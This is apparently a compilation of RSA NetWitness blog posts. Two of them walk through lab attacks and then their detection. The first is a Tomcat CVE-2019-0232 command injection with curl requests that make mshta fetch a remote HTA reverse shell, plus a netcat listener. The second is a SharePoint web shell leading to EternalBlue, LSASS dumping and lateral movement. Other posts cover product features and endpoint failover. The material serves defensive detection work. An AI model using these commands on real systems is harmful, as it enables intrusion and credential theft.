
What are LotL tactics?

Living-Off-The-Land tactics involve the use of legitimate tools for malicious purposes. The concept is old, but it is a growing trend among threat actors because these techniques are very difficult to detect: the tools involved are whitelisted most of the time. Good lists of applications that can be abused for these types of tactics are maintained at LOLBAS (Windows) and GTFOBins (UNIX).

 

Intro

The first part of this article shows how an attacker is able to spot and exploit a recent RCE (Remote Code Execution) vulnerability in Apache Tomcat. We will see how the attacker eventually obtains a reverse shell using a legitimate Windows utility, mshta.exe. The second part focuses on the detection phase, leveraging the RSA NetWitness Platform.

 

Scenario

The attacker has targeted an organization we will call examplecorp throughout this blog post. During the enumeration phase, thanks to resources such as Google dorks, shodan.io and nmap, the attacker has discovered the company runs a Tomcat server which is exposed to the Internet. Upon further research, the attacker finds a vulnerability and successfully exploits it in order to obtain a reverse shell, which will serve as the foundation for his malicious campaign against examplecorp.

 

To achieve what has been described in the above scenario, the attacker uses several tools and services:

 

The scenario is simulated on a virtual local environment. Below is a list of the IP addresses used:

  • 192.168.16.123  --> attacker machine (Kali Linux)
  • 192.168.16.38    --> victim/examplecorp machine  (Windows host where Tomcat is running)
  • 192.168.16.146  --> remote server where the attacker stored the malicious payload (shell.hta)

 

Part 1 - Attack phase

With enumeration tools such as nmap, gobuster, etc., the attacker discovers that the Tomcat server is at version 9.0.17, is running on Windows, and serves a legacy application through a CGI Servlet at the following address:

http://192.168.16.38:8080/cgi/app.bat

 

Hello World!

In our example the application is as simple as "Hello, World!"; in a real environment it would be something more substantial.

 

Upon further research the attacker discovers a vulnerability (CVE-2019-0232) in the CGI Servlet component of Tomcat prior to version 9.0.18. A detailed description of the vulnerability can be found at the following links:

 

With a simple test the attacker can verify the vulnerability. Just by adding ?&dir at the end of the URL, the attacker can see the output of the dir command on the Windows server where Tomcat is running.

root@kali:~# curl "http://192.168.16.38:8080/cgi/app.bat?&dir"
Hello, World!
Volume in drive C has no label.
Volume Serial Number is 4033-77BA

Directory of C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi

19/12/2019  13:27    <DIR>          .
19/12/2019  13:27    <DIR>          ..
17/12/2019  15:00    <DIR>          %SystemDrive%
16/12/2019  21:37                67 app.bat
19/12/2019  13:19                21 hello.py
               2 File(s)             88 bytes
               3 Dir(s)  39,850,405,888 bytes free

 

Now the attacker decides to create a malicious payload that will spawn a remote shell. To do that, he uses a tool dubbed WeirdHTA, which creates an obfuscated reverse shell in .hta format that he can then invoke remotely using the Microsoft mshta utility. Before initiating the attack, the attacker tests the file against the most common antivirus software to ensure it is properly obfuscated and not detected.

 

 

The attacker launches the below command to connect to the remote server and run the malicious payload:

root@kali:~# curl -v "http://192.168.16.38:8080/cgi/app.bat?&C%3A%2FWindows%2FSystem32%2Fmshta.exe+http%3A%2F%2F192.168.16.146%3A8000%2Fshell.hta"
*   Trying 192.168.16.38:8080...
* TCP_NODELAY set
* Connected to 192.168.16.38 (192.168.16.38) port 8080 (#0)
> GET /cgi/app.bat?&C%3A%2FWindows%2FSystem32%2Fmshta.exe+http%3A%2F%2F192.168.16.146%3A8000%2Fshell.hta HTTP/1.1
> Host: 192.168.16.38:8080
> User-Agent: curl/7.66.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Content-Type: text/plain
< Content-Length: 15
< Date: Fri, 31 Jan 2020 10:44:16 GMT
<
Hello, World!
* Connection #0 to host 192.168.16.38 left intact

 

If we break this command down we can see the following:

  1. curl -v "http://192.168.16.38:8080/cgi/app.bat
      The above is the URL of the Tomcat server where the CGI Servlet app (app.bat) resides
  2. ?&C%3A%2FWindows%2FSystem32%2Fmshta.exe+
      The second part is a URL-encoded string that decodes to C:\Windows\System32\mshta.exe
  3. http%3A%2F%2F192.168.16.146%3A8000%2Fshell.hta"
    This last part is the URL-encoded address of the remote location (http://192.168.16.146:8000/shell.hta) where the attacker keeps the malicious payload, shell.hta.
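The breakdown above can be reproduced with Python's standard library. The split on "+" mirrors how a CGI Servlet turns an indexed query string (one with no "=") into separate command-line arguments, each of which is percent-decoded:

```python
from urllib.parse import unquote

# The query string from the attacker's request (everything after "app.bat?&")
payload = "C%3A%2FWindows%2FSystem32%2Fmshta.exe+http%3A%2F%2F192.168.16.146%3A8000%2Fshell.hta"

# '+' separates command-line arguments; each piece is percent-decoded
# before being handed to the batch file
args = [unquote(part) for part in payload.split("+")]
print(args)
# ['C:/Windows/System32/mshta.exe', 'http://192.168.16.146:8000/shell.hta']
```

Once decoded, it is plain to see that the batch file is being tricked into running mshta.exe with the attacker's URL as its argument.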

 

The attacker, who had set up a netcat listener on his machine (192.168.16.123), obtains the shell:

root@kali:~# nc -lvnp 7777
listening on [any] 7777 ...
connect to [192.168.16.123] from (UNKNOWN) [192.168.16.38] 50057
Client Connected...

PS C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi> dir


    Directory: C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi


Mode                LastWriteTime         Length Name                                                                 
----                -------------         ------ ----                                                                 
d-----       17/12/2019     15:00                %SystemDrive%                                                        
-a----       16/12/2019     21:37             67 app.bat                                                              
-a----       19/12/2019     13:19             21 hello.py                                                             


PS C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi>

 

Part 2 - Detection phase with the RSA NetWitness Platform

While investigating with RSA NetWitness Endpoint the analyst notices the Behaviors of Compromise meta key populated with the value runs mshta with http argument, which is unusual.

 

 

Filtering by the runs mshta with http argument indicator, the analyst observes that an application running on Tomcat is launching mshta which in turn is calling an hta file residing on a remote server (192.168.16.146).

 

 

Drilling into these sessions using the event analysis panel, the analyst is able to confirm the events in more detail:

  1. app.bat (running on the machine with hostname winEP1 and IP 192.168.16.38)
  2. created a process
  3. which called mshta.exe
  4. and mshta.exe ran with the parameter http://192.168.16.146:8000/shell.hta

 

The analyst, knowing the affected machine IP address, decides to dig deeper with the RSA NetWitness Platform using the network (i.e. packet) data.

 

  1. Investigating around the affected machine IP in the same time range, the analyst notices the IP address 192.168.16.123 (the attacker) connecting to Tomcat on port 8080 (to test whether the server is vulnerable to CVE-2019-0232) by adding the dir command to the URL. He can also see the response.



  2. Immediately after the first event, the analyst notices the same IP address connecting on the same port but this time using a more complex GET request which seems to allude to malicious behavior.



  3. Now the analyst filters by ip.dst=192.168.16.146 (the IP address found in the GET request above) and is able to see the content of the shell.hta file. Although it is encoded and not human-readable, it is extremely suspicious!



  4. Next, the analyst filters by ip.dst=192.168.16.123 and eventually sees that the attacker has obtained shell access (through PowerShell) to the Windows machine where Tomcat resides.

 

Conclusion

LotL tactics are very effective and difficult to detect due to the legitimate nature of the tools used to perform such attacks. Constant monitoring and proactive threat hunting are vital for any organization. The RSA NetWitness Platform provides analysts with the visibility needed to detect such activities, thus reducing the risk of being compromised.

In this post we will cover CVE-2019-0604 (https://nvd.nist.gov/vuln/detail/CVE-2019-0604); albeit a somewhat older vulnerability, it is still being exploited. This post also goes a little further than the initial exploitation of the Sharepoint server, using EternalBlue to create a user on a remote endpoint to allow lateral movement with PAExec; again, this is an old, well-known vulnerability, but one still in use. We will then utilise Dumpert (https://github.com/outflanknl/Dumpert) to dump the memory of LSASS and obtain credentials, and then employ atexec from Impacket (https://github.com/SecureAuthCorp/impacket) to move laterally further.

 

The Attack

The initial foothold on the network is obtained via the Sharepoint vulnerability (CVE-2019-0604). We will use the PoC code developed by Voulnet (https://github.com/Voulnet/desharialize) to drop a web shell:

 

In the above command we are targeting the vulnerable Picker.aspx page, and using cmd to echo a Base64-encoded web shell to a file in C:\ProgramData\ - we then use certutil to Base64-decode the file into a publicly accessible directory on the Sharepoint server and name it bitreview.aspx.
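The drop-and-decode chain can be mimicked in Python to see why it works. This is a minimal sketch: the web shell source below is a hypothetical placeholder, and Python's base64 module stands in for certutil -decode:

```python
import base64

# Hypothetical stand-in for the web shell source; the real payload is a
# full ASPX script, not this one-liner
webshell_source = b'<%@ Page Language="JScript"%><%eval(Request.Item["pass"]);%>'

# Step 1 - what the echoed command drops into C:\ProgramData\: Base64 text,
# which survives transport through cmd without quoting/encoding problems
encoded = base64.b64encode(webshell_source)

# Step 2 - what "certutil -decode <in> <out>" then does on the server:
# Base64-decode the file back into the working web shell
decoded = base64.b64decode(encoded)
assert decoded == webshell_source
```

Encoding the payload this way is a common trick: the intermediate file is inert text, and only the certutil step materialises the actual web shell in the web-accessible directory.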

 

To access the web shell we just dropped onto the Sharepoint server, we are going to use the web shell management tool AntSword (https://github.com/AntSwordProject/antSword). Here we add the URL of the web shell we dropped and supply the associated password:

 

Now we can open a terminal and begin to execute commands on the server to get a lay of the land and find other endpoints to laterally move to:

 

The AntSword tool has a nice explorer view which allows us to easily upload additional tools to the server. In this instance we upload a scanner to check if an endpoint is vulnerable to EternalBlue:

 

Now we can iterate through some of the endpoints we uncovered earlier to see if any of them are vulnerable to EternalBlue:

 

Now that we have uncovered a vulnerable endpoint, we can use this to create a user that will allow us to laterally move to it. Using the PoC code created by Worawit (https://github.com/worawit/MS17-010), we can exploit the endpoint and execute custom shellcode of our choosing. For this I compiled some shellcode to create a local administrative user called helpdesk. I uploaded my shellcode and EternalBlue exploit executable and ran it against the vulnerable machine:

 

Now that we have created a local administrative user on the endpoint, we can laterally move to it using those credentials. In this instance, we upload PAExec and Dumpert, so we can laterally move to the endpoint and dump the memory of LSASS. The following command copies and executes Outflank-Dumpert.exe using PAExec and the helpdesk user we created via EternalBlue:

 

This tool will locally dump the memory of LSASS to C:\Windows\Temp - so we will mount one of the administrative shares on the endpoint, and confirm if our dump was successful:

 

Using AntSword's explorer, we can easily navigate to the file and download it locally:

 

We can then use Mimikatz on the attacker's local machine to dump the credentials, which may help us laterally move to other endpoints:

 

We decide to upload the atexec tool from Impacket to execute commands on the remote endpoint and see if there are other machines we can laterally move to. Using some reconnaissance commands, we find an RDP session using the username we pulled from the LSASS dump:

 

From here, we could continue to laterally move, dump credentials, and further own the network.

 

Detection using NetWitness Network

NetWitness doesn't always have to be used for threat hunting; it can also be used to search for things you know about or have recently been researching. Taking the Sharepoint RCE as an example, we can easily search using NetWitness to see if any exploits have taken place. Given that this is a well-documented CVE, we can start our searching by looking for requests to picker.aspx (filename = 'picker.aspx'), which is the vulnerable page. From the below we can see two GET requests and a POST for Picker.aspx (inbound requests directly to this page are uncommon):

Next we can reconstruct the events to see if there is any useful information we can ascertain. Looking into the HTTP POST, we can see the URI matches what we would expect for this vulnerability. We also see that the POST parameter ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData contains the hex-encoded, serialized .NET XML payload. The payload parameter also starts with two underscores, which ensures the payload reaches the XML deserialization function, as documented:

 

Seeing this would already warrant investigation on the Sharepoint server, but let's use some Python so we can take the hex-encoded payload and deserialize it to see what was executed:
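As a sketch of that decoding step: full .NET deserialization isn't needed just to read the embedded command, because hex-decoding the parameter already exposes the serialized XML as text. The fragment below is a short hypothetical stand-in for the real multi-kilobyte payload:

```python
import binascii

# Hypothetical fragment of the hex-encoded hiddenSpanData payload
# (the real one is several kilobytes of serialized .NET XML)
hex_fragment = "636d64202f63206563686f"

# Hex-decoding alone is enough to expose the embedded command text
command = binascii.unhexlify(hex_fragment).decode("ascii")
print(command)
# cmd /c echo
```

Scanning the decoded text for cmd, certutil, or powershell strings is usually the fastest way to pull the executed command out of the gadget chain.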

 

From this, we have the exact command that was run on the Sharepoint server that dropped a web shell. This also means we now know the name of the web shell and where it is located, making the next steps of investigation easier:

As analysts, it sometimes pays to do these things to find additional breadcrumbs to pull from, although be careful, as this can be time consuming and other methods can make it a lot easier, like MFT analysis that is described later on in the blog post.

 

This means we could search for this filename in NetWitness to see if we have any hits (filename = 'bitreview.aspx'):

 

As you can see from the above highlighted indicators, even without knowing the name of the web shell we would have still uncovered it, as NetWitness created numerous meta values surrounding its usage. A fairly recent addition to the Lua parsers available on RSA Live is fingerprint_minidump.lua. This parser creates the meta value minidump under the Filetype meta key, and the meta value lsass minidump under the Indicators of Compromise meta key. It is a fantastic addition, as it tags LSASS memory dumps traversing the network, which is uncommon behaviour.

 

Reconstructing the events, we can see the web shell traffic which looks strikingly similar to China Chopper. The User-Agent is also a great indicator for this traffic, which is the name of the tool used to connect to the web shell:

 

We can Base64 decode the commands from the HTTP POSTs and get an insight into what was being executed. The below shows the initial POST, which returns the current path, operating system, and username:
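The decoding step itself is trivial to reproduce. In the sketch below the command is a hypothetical example; in practice you would paste the captured Base64 string straight from the POST body:

```python
import base64

# Hypothetical command; in practice, paste the Base64 string captured
# from the AntSword HTTP POST body here
captured = base64.b64encode(b'cd /d "C:\\ProgramData\\"&dir').decode()

# Decoding the POST body reveals the exact command the web shell executed
decoded_cmd = base64.b64decode(captured).decode("ascii")
print(decoded_cmd)
# cd /d "C:\ProgramData\"&dir
```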

 

The following shows a directory listing of C:\ProgramData\ being executed, which is where the initial Base64 encoded bitreview.aspx web shell was dropped:

 

We should continue to Base64 decode all of these commands to gain a better understanding of what the attacker did, but for this blog post I will focus on the important pieces of the traffic. Pivoting into the Events view for the meta value hex encoded executable, we can see the magic bytes of an executable that has been hex encoded:

 

Extracting all the hex starting from 4D5A (MZ header in hexadecimal) and decoding it with CyberChef, we can clearly see this is an executable. From here, we could save this file and perform further analysis on it:
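This carving step can also be scripted. The sketch below uses a short hypothetical capture in place of the real parameter; note that in real captures the 4D5A marker must sit at an even offset within the hex stream for byte alignment:

```python
import binascii

# Hypothetical captured parameter: leading junk followed by a hex-encoded
# executable (a real PE would continue for many kilobytes)
captured = "3d26763d31264D5A90000300000004000000FFFF0000"

# Carve from the MZ header (4D5A) onward and hex-decode, mirroring the
# CyberChef "From Hex" step described above
start = captured.upper().find("4D5A")
binary = binascii.unhexlify(captured[start:])
assert binary[:2] == b"MZ"  # DOS magic bytes of a PE file
```

From here the carved bytes could be written to disk and triaged like any other suspicious executable.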

 

Continuing on with Base64 decoding the commands, we come across something interesting: the usage of a tool called eternalblue_exploit7.exe against an endpoint in the same network. This gives the defender additional information on other endpoints of interest to the attacker, and endpoints to focus on:

If you only have packet visibility, you should always decode every command. This will help you as a defender better understand the attacker's actions and uncover additional breadcrumbs. But if you have NetWitness Endpoint, it may be easier to see the commands there, as we will see later.

 

Knowing EternalBlue uses SMB, we can pivot on all SMB traffic from the Sharepoint server to the targeted endpoint. Opening the Enablers of Compromise meta key, we can see two meta values indicating the use of SMBv1; this is required for EternalBlue to work. There is also a meta value of not implemented under the Error meta key; this is fairly uncommon and can help detect potential EternalBlue exploitation:

 

Reconstructing the events for the SMBv1 traffic, we come across a session that contains a large sequence of NULLs; this is the beginning of the EternalBlue exploit, and these NULLs essentially move the SMB server state to a point where the vulnerability exists:

 

With most intrusions, there is typically some form of lateral movement that takes place using SMB. As a defender we should iterate through all possible lateral movement techniques, but for this example I want to see if PAExec has been used. To do this I use the following query (service = 139 && filename = 'svcctl' && filename contains 'paexe'). From the below, we can see that there is indeed some PAExec activity. By default, PAExec includes the hostname where the activity originated, so from the below filenames we can tell that this activity came from SP2016, the Sharepoint server. We can also see that a file was transferred, as indicated by the paexec_move0.dat meta value - this is the Outflank-Dumpert.exe tool:

 

Back in the Investigation view, under the Indicators of Compromise meta key, we see a meta value of lsass minidump. Pivoting on this value, we see the dumpert.dmp file in the temp\ directory for the endpoint that was accessed over the ADMIN$ share - this is our LSASS minidump created using the Outflank-Dumpert.exe tool:

 

Navigating back to view all the SMB traffic, and focusing on named pipes (service = 139 && analysis.service = 'named pipe'), we can see a named pipe being used called atsvc. This named pipe gives access to the AT-Scheduler Service on an endpoint and can be used to schedule tasks remotely. We can also see some .tmp files being created in the temp\ directory on this endpoint with what look like randomly generated names, and windows cli admin commands associated with one of them:

 

Reconstructing the events for this traffic, we can see the scheduled tasks being created. In the below screenshot, we can see the XML and the associated parameters passed, in this instance using CMD to run netstat looking for RDP connections and output the results to %windir%\Temp\rWLePJvp.tmp:

 

This is lateral movement behaviour via Impacket's atexec tool. It writes the output of the command to a file so it can read it and display it back to the attacker. Further analysing the payload, we can see the output that was read from the file and gain insight into what the attacker was after, and subsequently which endpoints to investigate:

 

 

Detection using NetWitness Endpoint

As always with NetWitness Endpoint, I like to start my hunting by opening the three compromise keys (IOC, BOC, and EOC). In this case, I only had meta values under the Behaviours of Compromise meta key. I have highlighted a few I deem more interesting with regards to this blog, but you should really investigate all of them:

 

Let's start with the runs certutil with decode arguments meta value. Opening this in the Events view, we can see the parameter that was executed: a Base64-encoded value being echoed to the C:\ProgramData\ directory, and then certutil being used to decode it and push it to a directory on the server:

 

From here, we could download the MFT of the endpoint:

 

Locate the file that was decoded, download it locally, and see what the contents are:

 

From the contents of the file, we can see that this is a web shell:

 

We also observed the attacker initially drop a file in the C:\ProgramData\ directory, so this is also a directory of interest and somewhere we should browse to within the MFT - here we uncover the attackers tools which we could download and analyse:

 

Navigating back to the Investigate view and opening the meta value http daemon runs command prompt in the Events view, we can see the HTTP daemon, w3wp.exe, executing reconnaissance commands on the Sharepoint server:

This is a classic indicator for a web shell, whereby we have a HTTP daemon spawning CMD to execute commands.

 

Further analysis of the commands executed by the attacker shows EternalBlue executables being run against an endpoint. After this, the attacker uses PAExec with a user called helpdesk to connect to the endpoint, implying that the EternalBlue exploit created a user called helpdesk that allowed them to laterally move (NOTE: we will see how the user creation via this exploit looks a little later on):

 

Navigating back to Investigate, and this time opening the Events view for creates local user account, we see lsass.exe running net.exe to create a user account called helpdesk; this is the EternalBlue exploit. LSASS should never create a user, so this is a high-fidelity indicator of malicious activity:

 

Another common attacker action is to dump credentials. Due to the popularity of Mimikatz, attackers are looking for other methods of dumping credentials; this typically involves creating a memory dump of the LSASS process. We can therefore use the following query (action = 'openosprocess' && filename.dst = 'lsass.exe') and open the Filename Source meta key to look for anything opening LSASS that stands out as anomalous. Here we can see a suspect executable named Outflank-Dumpert.exe opening LSASS:

 

As defenders, we should continue to triage all of the meta values observed. But for this blog post, I feel we have demonstrated NetWitness' ability to detect these threats.

 

Detection Rules

The following table lists some application rules you can deploy to help with identifying these tools and behaviours:

Appliance | Description | Logic | Fidelity
Packet Decoder | Requests of interest to Picker.aspx | service = 80 && action = 'post' && filename = 'picker.aspx' && directory contains '_layout' | Medium
Packet Decoder | AntSword tool usage | client begins 'antsword' | High
Packet Decoder | Possible Impacket atexec usage | service = 139 && analysis.service = 'named pipe' && filename = 'atsvc' && filename ends 'tmp' | Medium
Packet Decoder | Dumpert LSASS dump | filename = 'dumpert.dmp' | High
Packet Decoder | Possible EternalBlue exploit | service = 139 && error = 'not implemented' && eoc = 'smb v1 response' | Low
Packet Decoder | PAExec activity | service = 139 && filename = 'svcctl' && filename contains 'paexe' | High
Endpoint Log Hybrid | Opens OS process LSASS | action = 'openosprocess' && filename.dst = 'lsass.exe' | Low
Endpoint Log Hybrid | LSASS creates user | filename.src = 'lsass.exe' && filename.dst = 'net.exe' && param.dst contains '/add' | High

 

Conclusion

Threat actors are consistently evolving and developing new attack methods, but they are also using tried and tested methods as well - there is no need for them to use a new exploit when a well-known one works just fine on an unpatched system. Defenders should not only be keeping up to date with the new, but also retroactively searching their data sets for the old.

Hi everyone!  In this video blog, I provide a demo of deploying an 11.4 RSA NetWitness Platform full stack within AWS. The demo deployment includes the following hosts:

  • NW Server
  • Network Hybrid
  • Health & Wellness Beta
  • Analyst UI

 

Please like or comment to let me know if this vblog was useful.

 

Mike

RSA NetWitness Platform - Product Manager

Visualization techniques can help an analyst make sense of a given data set by exposing scale, relationships, and features that would be almost impossible to derive by just looking at a list of individual data points.  As of RSA NetWitness Platform 11.4, we have added new physics and layout techniques to the nodal diagram in Respond in order to make better sense of the data both for when using Respond as an Incident/Case Management tool or when simply using Respond to group events and track non-case investigations (see Using Respond for Data Exploration for some ideas).

 

 

 

Clustering by Entity Type

Prior to 11.4, the nodal graph evenly distributed the nodes regardless of entity type (Host, IP, User, MAC, File). Improvements were made to introduce intelligent clustering such that entities of the same type not only retain their distinct color, but also have a higher chance of being clustered together.  This layout improvement makes it clearer to see relationships between different entity types, particularly when dealing with larger sets of data.

 

Variable Edge Forces Based on Relationship Type

Prior to 11.4, all edges between nodes were treated equally, resulting in lengths being rendered equally between all sets of connected nodes.  Improvements were made to adjust the relative attraction forces, helping to better distinguish attribute type relationships ("as", "is named", "belongs to", and "has file") from action type relationships ("calls", "communicates with", "uses").  Edges representing attributes will tend to be much shorter than those representing actions, which has the added benefit of reducing the number of overlapping edges, making relationships, scope, and sprawl much easier for an analyst to see at a glance.

 

 

Separation of Disconnected Clusters

Prior to 11.4, all nodes and edges were grouped into one large cluster, even if certain nodes in the data set did not have any relationship with others, requiring tedious manual dragging of nodes in order to distinguish the groupings.  Now, disjoint clusters of nodes are repelled from one another upon initial layout, making it extremely clear which sets of data are joined by some kind of relationship.  This is particularly helpful when using Respond for general data exploration of larger data sets (vs visualizing a single incident) that do not necessarily have commonality: it draws the analyst's eyes to potentially interesting outliers, and once again reduces the number of overlapping edges that have historically made certain nodal graphs difficult to read, depending on the data set.


Improved Nodal Interaction

In addition to the physics governing new layouts, improvements have been made to nodal interaction to help take advantage of them.  Given the potential size and complexity of data sets, despite the introduction of layout and force techniques, the layout may not always be optimal.  The goal was to improve interaction by minimizing the number of graph drags needed by an analyst to make sense of even the most tangled data sets.  When dragged, nodes with high connectivity will generally attract other nodes with which a relationship exists.  Also, once any node is manually dragged into position, manipulating the position of other nodes will no longer impart a moving force, meaning the original dragged node will stay in place.  To "unpin" dragged nodes and have them spring back into place, simply double click.

 

 

As always, if you have any feedback or suggestions on how to make this experience even better, please leave a comment or, better yet, search, submit, and vote on product enhancements on the RSA Ideas portal: RSA Ideas for the RSA NetWitness Platform 

 

Happy Hunting!

Did you know that you can use Respond for data exploration, even if you aren't using it for Incident Management?  While the naming convention certainly does not suggest it, Respond can be just as useful outside of incident response as a place for analysts to group events of interest during investigation and hunting efforts.  Using Respond as more of an analyst workspace can help teams collaborate better, track streams of thought, and take advantage of Respond's new and improved visualization capabilities as of 11.4 (see Visualization Enhancements in RSA NetWitness Platform 11.4 for details).

 

 

 

Step 1 - Create an "Incident" from Events view

Once you have a set of data that carries significance, you can select any set or subset of events contained in a data set and use it to create a new "Incident".  For our purposes here, you'll have to look past the current naming conventions of Alerts and Incidents and just think of it as a grouping of events (log, endpoint, or network sessions).

 

What data sets to use is largely up to you, but this type of approach is particularly useful when following a methodology that requires systematically carving larger data sets into smaller, more manageable ones.  The example above is based on RSA's Network Hunting Guide, details of which can be found here: RSA NetWitness Hunting Guide 

 

Step 2 - Open in Respond

Once opened, all of the capabilities available when using Respond for Incident Management are available.  It doesn't mean you have to use all of them, but you may find some of them to be a handy way to tag in other analysts (Tasks) and keep track of your analysis (Journal).  And if you do happen to find something malicious in the data set, all of the relevant information is already contained.

 

In the example above, we're seeing if anything interesting shows up in the data set for "All outbound HTTP sessions using the POST method".  The nodal diagram can be a useful way to see how the data is distributed between entities (larger bubbles meaning a larger number of events), which sub data sets within the larger one are dealing with disjoint sets of entities (Files, Hosts, IPs, Users, MAC Addresses), and can key your eye towards groupings that lead to deeper levels of inspection.  

 

Step 3 - Use Respond Tools to Track, Pivot, and Collaborate


View Event Cards


In-line Event Reconstruction (eg. Network Reconstruction)


Entity Details - Pivot To Other Views 

 

Collaboration

Add New Events 

And don't forget that you can always add more events to the same Respond incident to expand investigation if more leads are uncovered. Simply start from the top, and "Add To Incident".

 

As always, if you have any feedback or suggestions on how to make this experience even better, please leave a comment or, better yet, search, submit, and vote on product enhancements on the RSA Ideas portal: RSA Ideas for the RSA NetWitness Platform 

 

Happy Hunting!

The newest version of the RSA NetWitness Platform is almost here!

 

We’re excited to release the 11.4 version of the RSA NetWitness Platform very soon. We’ve worked hard on many new features and enhancements that will help users detect, investigate, and understand threats in their organizations.

 

This version introduces new features in analyst investigation, UEBA, Respond, administrative functions, and RSA NetWitness Endpoint that collectively make security teams more efficient and arm them with the most relevant and actionable security data. Some of the more noteworthy 11.4 features include:

 

  • Enhanced Investigation Capabilities: Fully integrated free-text search, auto-suggestion, & search profiles
  • Smarter Network Threat & Anomaly Detection: UEBA expanded to analyze packet data with 24 new indicators
  • Improved Visualization of Incidents: Respond visualizations are clearer with enhanced relationship mapping
  • Expanded Functions for Endpoint Response: Powerful Host forensic actions and dynamic analysis directly from the RSA NetWitness Platform
  • Simplified File Collection from Endpoint Agents
  • Single Sign-on Capability
  • Distributed Analyst User Interfaces
  • New Health and Wellness (BETA)


This is not an exhaustive list of all the changes; please see the Release Documentation for the nitty-gritty of the release details and the full list of all the changes we've made in this release.

 

In the coming days and weeks, we’ll be publishing additional blog entries that demonstrate how this new functionality operates, and the benefits customers can expect to realize in 11.4.

 

The RSA Product team is excited for you to try this new release!

High availability (HA) is a common need in many enterprise architectures, so NetWitness Endpoint has some built-in capabilities that allow organizations to achieve an HA setup with fairly minimal configuration and implementation effort.

 

An overview of the setup:

  1. Install Primary and Alternate Endpoint Log Hybrids (ELH)
  2. Create a DNS CNAME record pointing to your Primary ELH
  3. Create Endpoint Policies with the CNAME record's alias value

 

The failover procedure:

  1. Change the CNAME record to point to the Alternate ELH

 

And the failback procedure:

  1. Change the CNAME record back to the Primary ELH

 

To start, you'll need to have an ELH already installed and orchestrated within your environment. We'll assume this is your Primary ELH: where your endpoint agents will ordinarily be checking in, and what you need an alternate for in the event of a failure (hardware breaks, datacenter loses power, region-wide catastrophic event...whatever).

 

To install your Alternate ELH (where your endpoint agents should failover to) you'll need to follow the instructions here: https://community.rsa.com/docs/DOC-101660#NetWitne  under "Task 3 - Configuring Multiple Endpoint Log Hybrid".

**Make sure that you follow these instructions exactly...I did not the first time I set this up in my lab, and so of course my Alternate ELH did not function properly in my NetWitness environment...**

 

Once you have your Alternate ELH fully installed and orchestrated, your next step will be to create a DNS CNAME record.  This alias will be the key to the entire HA implementation.  You'll want to point the record to your Primary ELH; e.g.: 

 

**Be aware that Windows DNS defaults to a 60-minute TTL...this will directly impact how quickly your endpoint agents will point to the Target Host FQDN in the CNAME record, so if 60 minutes is too long to wait for endpoints to be available during a failover, you might want to consider setting the TTL lower...** (props to John Snider for helping me identify this in my lab during my testing)

 

And your last step in the initial setup will be to create Endpoint Policies that use this alias value.  In the NetWitness UI, navigate to Admin/Endpoint Sources/Policies and either modify an existing EDR policy (the Default, for instance) or create a new EDR policy.  The relevant configuration option in the EDR policy setting is the "Endpoint Server" option within the "Endpoint Server Settings" section:

 

When editing this option in the Policy, you'll want to choose your Primary ELH in the "Endpoint Server" dropdown and (the most important part) enter the CNAME record's alias as the "Server Alias":

 

Add and/or modify any additional policy settings as required for your organization and NetWitness environment, and when complete be sure to Publish your changes. (Guide to configuring Endpoint Groups and Policies here: NetWitness Endpoint Configuration Guide for RSA NetWitness Platform 11.x - Table of Contents)

 

You can test your setup and environment by running some nslookup commands from endpoints within your environment to check that your DNS CNAME is working properly and endpoints are resolving the alias to the correct target (Primary ELH at this point), as well as creating an Endpoint EDR Policy to point some active endpoint agents to the Alternate ELH (**this check is rather important, as it will help you confirm that your Alternate ELH is installed, orchestrated, and configured correctly**).
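If you would rather script that resolution check than eyeball nslookup output, here is a minimal Python sketch. The hostnames are hypothetical, and the resolver is injectable so the logic can be exercised offline with a fake:

```python
import socket

def check_alias(alias, expected_target, resolve=socket.gethostbyname_ex):
    """Resolve an alias and verify the canonical name it points at.

    socket.gethostbyname_ex returns (canonical_name, alias_list, ip_list);
    for a CNAME alias the canonical name is the record's current target.
    """
    canonical, _aliases, ips = resolve(alias)
    return canonical.lower() == expected_target.lower(), canonical, ips

# Exercise the logic offline with a fake resolver (hostnames are made up):
fake = lambda name: ("elh-primary.examplecorp.local", [name], ["10.0.0.10"])
ok, target, ips = check_alias("endpoint.examplecorp.local",
                              "elh-primary.examplecorp.local",
                              resolve=fake)
print(ok, target, ips)  # → True elh-primary.examplecorp.local ['10.0.0.10']
```

Running the same function with the default resolver on an endpoint would confirm what the agents themselves will see when they resolve the alias.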

 

Prior to moving on to the next step, ensure that all your agents have received the "Updated" Policy - if any show in the UI with a "Pending" status after you've made these changes, then that means they have not yet updated:

 

Assuming all your tests come back positive and all your agents' policies are showing "Updated", you can now simulate a failure to validate that your setup is, indeed, HA-capable. This can be quite simple, and the failover process similarly straightforward.

 

  1. Shutdown the Primary ELH
  2. Modify the DNS CNAME record to point to the Alternate ELH
    1. This is where the TTL value will become important...the longer the TTL, the longer it may take your endpoints to change over to the Alternate ELH
    2. Also...there is no need to change the existing Endpoint Policy, as the Server Alias you already entered will ensure your endpoints follow the CNAME record to its new target
  3. Confirm that you see endpoints talking to the Alternate ELH
    1. Run tcpdump on the Alternate ELH to check for incoming UDP and TCP packets from endpoints
    2. See hosts showing up in the UI
    3. Investigate hosts

 

After Steps 1 and 2 are complete, you can confirm that agents are communicating with the Alternate ELH by running tcpdump on that Alternate ELH to look for the UDP check-ins as well as the TCP tracking/scan data uploads:

 

...as well as confirm in the UI that you can see and investigate hosts:

 

 

Once your validation and testing is complete, you can simply revert the procedure by powering on the Primary ELH, powering off the Alternate ELH, and modifying the CNAME record to point back to the Primary ELH.

 

Of course, during an actual failure event, your only action to ensure HA of NetWitness Endpoint would be to change the CNAME record, so be sure to have a procedure in place for an emergency change control, if necessary in your organization.

A couple of months ago, Mr-Un1k0d3r released a lateral movement tool that solely relies on DCE/RPC (https://github.com/Mr-Un1k0d3r/SCShell). This tool does not create a service and drop a file like PsExec or similar tools would do, but instead uses the ChangeServiceConfigA function (and others) to edit an existing service and have it execute commands, making this a fileless lateral movement tool.

 

